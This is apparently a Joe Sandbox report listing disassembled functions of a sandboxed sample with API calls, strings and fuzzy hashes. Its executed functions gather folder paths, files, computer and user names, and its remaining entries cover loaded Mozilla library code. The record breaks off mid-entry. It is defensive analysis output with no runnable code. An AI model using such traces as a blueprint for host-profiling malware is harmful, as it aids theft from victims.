Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,00CE7DD8), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 9bc73e1a2912a33f1f36617177c5fd95dec5be0edf159ab3d9207ba3008aa481
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: 9bc73e1a2912a33f1f36617177c5fd95dec5be0edf159ab3d9207ba3008aa481
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,00CE2D58,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 659055F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,658DE1A5), ref: 65905606
LoadLibraryW.KERNEL32(gdi32,?,658DE1A5), ref: 6590560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 65905633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6590563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6590566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6590567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 65905696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 659056B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 659056CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 659056E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 659056FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 65905716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6590572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 65905748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 65905761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6590577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 65905793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 659057A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 659057BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 659057D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 659057EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 659057FF

Strings

GetDpiForWindow, xrefs: 65905690
gdi32, xrefs: 6590560A
FillRect, xrefs: 65905729
LoadIconW, xrefs: 6590575B
RegisterClassW, xrefs: 659056AC
DeleteObject, xrefs: 659057F9
EnableNonClientDpiScaling, xrefs: 65905666
SetWindowLongPtrW, xrefs: 659057B7
AreDpiAwarenessContextsEqual, xrefs: 65905637
LoadCursorW, xrefs: 65905774
CreateWindowExW, xrefs: 659056C5
user32, xrefs: 65905601
SetWindowPos, xrefs: 659056F7
ShowWindow, xrefs: 659056DE
GetThreadDpiAwarenessContext, xrefs: 6590562D
GetMonitorInfoW, xrefs: 659057A2
CreateSolidBrush, xrefs: 659057E4
StretchDIBits, xrefs: 659057CC
MonitorFromWindow, xrefs: 6590578D
GetWindowDC, xrefs: 65905710
ReleaseDC, xrefs: 65905742
GetSystemMetricsForDpi, xrefs: 65905677

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 7bd5782e3e8685d45ffa0dbaf00ac2fcf76947de8df797118e1fd578f2694488
Instruction ID: d83163c3a6a4b516000ab8fe23a30bd13841f9cf98bf1723c0ff14636593f7ab
Opcode Fuzzy Hash: 7bd5782e3e8685d45ffa0dbaf00ac2fcf76947de8df797118e1fd578f2694488
Instruction Fuzzy Hash: 0D512D7453C716ABEB015F358D98E3A3AFDFF46245704442DAD12E2296EF78C8008FA6

Uniqueness

Uniqueness Score: -1.00%

Function 658B9590 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 658A31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 658A3217
Part of subcall function 658A31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 658A3236
Part of subcall function 658A31C0: FreeLibrary.KERNEL32 ref: 658A324B
Part of subcall function 658A31C0: __Init_thread_footer.LIBCMT ref: 658A3260
Part of subcall function 658A31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 658A327F
Part of subcall function 658A31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 658A328E
Part of subcall function 658A31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 658A32AB
Part of subcall function 658A31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 658A32D1
Part of subcall function 658A31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 658A32E5
Part of subcall function 658A31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 658A32F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 658B9675
__Init_thread_footer.LIBCMT ref: 658B9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 658B96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 658B9707
__Init_thread_footer.LIBCMT ref: 658B971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 658B9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 658B97B7
FreeLibrary.KERNEL32 ref: 658B97D0
FreeLibrary.KERNEL32 ref: 658B97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 658B9824

Strings

O'/, xrefs: 658B959E, 658B9632
ntdll.dll, xrefs: 658B96E3
NtMapViewOfSection, xrefs: 658B9701
MapViewOfFileNuma2, xrefs: 658B97B1
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 658B9670

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll$O'/
API String ID: 3361784254-644002980
Opcode ID: aabb123e64b26548757ad78babbb6ce68b5faa11f24afd76448cd726b8f06710
Instruction ID: cb0ad5fa9887e73e7723346cd8aeb15f8de0c27f665f4a7753e5760c9b1d3075
Opcode Fuzzy Hash: aabb123e64b26548757ad78babbb6ce68b5faa11f24afd76448cd726b8f06710
Instruction Fuzzy Hash: 1861B1715283099BDF00DF68D885F9A7BF9FB4A318F048929E91597780DB70EC54CB92

Uniqueness

Uniqueness Score: -1.00%

Function 658FDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 658FDDCF

Part of subcall function 658DFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 658DFA4B

Part of subcall function 658F90E0: free.MOZGLUE(?,00000000,?,?,658FDEDB), ref: 658F90FF
Part of subcall function 658F90E0: free.MOZGLUE(?,00000000,?,?,658FDEDB), ref: 658F9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 658FDE0D
free.MOZGLUE(00000000), ref: 658FDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 658FDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 658FDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 658FDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,658EDEFD,?,658B4A68), ref: 658FDF32

Part of subcall function 658FDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 658FDB86
Part of subcall function 658FDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 658FDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,658EDEFD,?,658B4A68), ref: 658FDF65
free.MOZGLUE(?), ref: 658FDF80

Part of subcall function 658C5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 658C5EDB
Part of subcall function 658C5E90: memset.VCRUNTIME140(65907765,000000E5,55CCCCCC), ref: 658C5F27
Part of subcall function 658C5E90: LeaveCriticalSection.KERNEL32(?), ref: 658C5FB2

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: f0f4a9e9ad4401fd39b63192bf33867fb2630989fd1233fd0e3c7b708ed8fd77
Instruction ID: 721344f40a71d7efb291ae0806cc78c3e5edfca0278b2a4da78fdf0f96550d91
Opcode Fuzzy Hash: f0f4a9e9ad4401fd39b63192bf33867fb2630989fd1233fd0e3c7b708ed8fd77
Instruction Fuzzy Hash: 8C5195766167019BD721DF18C8807AEB372BF9A394F850918DA9A53B00DB31FD17CB92

Uniqueness

Uniqueness Score: -1.00%

Function 658B05F0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 226COMMON

Download Yara Rule

Strings

O'/, xrefs: 658B0601

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID:
String ID: O'/
API String ID: 0-3288639832
Opcode ID: 7b1765095736d13bde4e964e3165abae16d8d98eb97e63f5b18538d1a2609223
Instruction ID: cee7e5f21c6f9978cc9e74c31e46ce6c997963efe396319ed8a058b36b96a76a
Opcode Fuzzy Hash: 7b1765095736d13bde4e964e3165abae16d8d98eb97e63f5b18538d1a2609223
Instruction Fuzzy Hash: ECA13770904705CFDB14CF29CA94A9AFBF5BF49304F50896ED44A97B01E771AA85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 658E6590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 658DFA80: GetCurrentThreadId.KERNEL32 ref: 658DFA8D
Part of subcall function 658DFA80: AcquireSRWLockExclusive.KERNEL32(6592F448), ref: 658DFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 658E6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 658E67C8

Part of subcall function 658F4290: memcpy.VCRUNTIME140(?,?,65902003,65900AD9,?,65900AD9,00000000,?,65900AD9,?,00000004,?,65901A62,?,65902003,?), ref: 658F42C4

Strings

data, xrefs: 658E6593
O'/, xrefs: 658E65A3

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$O'/
API String ID: 511789754-1362457199
Opcode ID: bb176591985e897d8cbc6a8c66c890fe94a21fb75b344e8e2417c0532e03b6ff
Instruction ID: 0d4ec4cd366b0fce7d103ac328f8fb4a575e295a1be5b36fe1c5e9ded9cb6d57
Opcode Fuzzy Hash: bb176591985e897d8cbc6a8c66c890fe94a21fb75b344e8e2417c0532e03b6ff
Instruction Fuzzy Hash: 67D1BD74A183408BD724DF29D841B9EB7F5BFC6304F144E2DE58A87791EB30A945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 658DD5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,658AEB57,?,?,?,?,?,?,?,?,?), ref: 658DD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,658AEB57,?), ref: 658DD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,658AEB57,?), ref: 658DD673
free.MOZGLUE(?), ref: 658DD888

Strings

O'/, xrefs: 658DD5DC, 658DD7AC
|Enabled, xrefs: 658DD81E

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled$O'/
API String ID: 4142949111-1964164222
Opcode ID: c922a49f6c601bc8d19201fcb0f03d19fc80f1c5d17cc15fee2f9c4973b45f1b
Instruction ID: 2693cfc8e69759453de17318e95d8cda0a0ea4af25b5ac039798c4433339040e
Opcode Fuzzy Hash: c922a49f6c601bc8d19201fcb0f03d19fc80f1c5d17cc15fee2f9c4973b45f1b
Instruction Fuzzy Hash: 5DA1E1B0A053499FDB11CF68C490BAEFBF1AF49318F14895CD899AB741C731AD45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 658A4DE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 658A4E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 658A4E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 658A4EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 658A4F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 658A4F1E

Strings

O'/, xrefs: 658A4DF6

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID: O'/
API String ID: 713647276-3288639832
Opcode ID: 53fe4305ab21dd3536dca7dcf1a36fd13a6bc4df179cda9529a6c1e33db51aa2
Instruction ID: 6b13724fb5160849b66acdc1a21efcfbf0872327db6fa866a861a2b65913868c
Opcode Fuzzy Hash: 53fe4305ab21dd3536dca7dcf1a36fd13a6bc4df179cda9529a6c1e33db51aa2
Instruction Fuzzy Hash: A641AE726087059FCB04CF68C880A5BB7E4BFC9354F108A2DF9A697661DB30ED55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 658EF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 658DCBE8: GetCurrentProcess.KERNEL32(?,658A31A7), ref: 658DCBF1
Part of subcall function 658DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,658A31A7), ref: 658DCBFA

